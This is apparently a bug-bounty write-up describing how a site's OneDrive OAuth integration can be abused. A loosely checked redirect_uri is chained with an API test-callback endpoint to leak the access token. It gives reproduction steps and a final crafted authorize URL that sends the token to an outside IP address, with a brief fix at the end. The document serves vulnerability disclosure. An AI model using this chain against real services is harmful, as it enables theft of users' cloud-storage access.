Stealing Access Token of One-drive Integration By Chaining CSRF Vulnerability

Arbaz Hussain
Jul 18, 2017 · 2 min read

Severity: High

Complexity: Easy

Weakness: partial 0Auth redirect_uri path

Step’s to Reproduce:

  1. Site have Third Party integration tab at site.com/integrations. They have one-drive integration .
  2. When we Click Activate on Onedrive integration.
  3. We Get Redirected to :

https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/account/skydriveOAuthCallback&scope=wl.basic wl.skydrive wl.skydrive_update wl.offline_access

From Above URL:

redirect_uri=https://www.site.com/account/skydriveOAuthCallback

4. So i started playing with redirect_uri=

I Found that redirect_uri is Accepting Anything After

redirect_uri=https://www.site.com/account/xxxxxxxxxx

5. This Confirm’s that they haven’t used Strict Path in redirect_uri Allowing anything after redirect_uri=https://www.site.com/account/*

https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com/xxxxxxxxxxx&scope=wl.basic wl.skydrive wl.skydrive_update wl.offline_access

6. So Now Possible way’s to Exploit this to get Access token is by Finding Any Open Redirect Vulnerability. So I Keep Looking for Any OpenRedirect Endpoints in site.com to Exploit but no luck.

7. Next day Started reading their API Documentation .

And I Came Across :

GET /api/testCallback?callback_url=http://yoursite.com

which they used for Checking API Callback Request’s on your server.

8. So Finally We Got CSRF Vulnerability Which Make’s GET Request to Attacker’s Server.

&redirect_uri=https://www.site.com /api/testCallback?callback_url=http://52.66.158.189/?

Finally:

https://login.live.com/oauth20_authorize.srf?client_id=00000000440E0CCX&response_type=code&redirect_uri=https://www.site.com /api/testCallback?callback_url=http://52.66.158.189/?&scope=wl.basic+wl.skydrive+wl.skydrive_update+wl.offline_access

~ Success ~

exact path matches should be made instead of partial matches on redirect_uri .

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store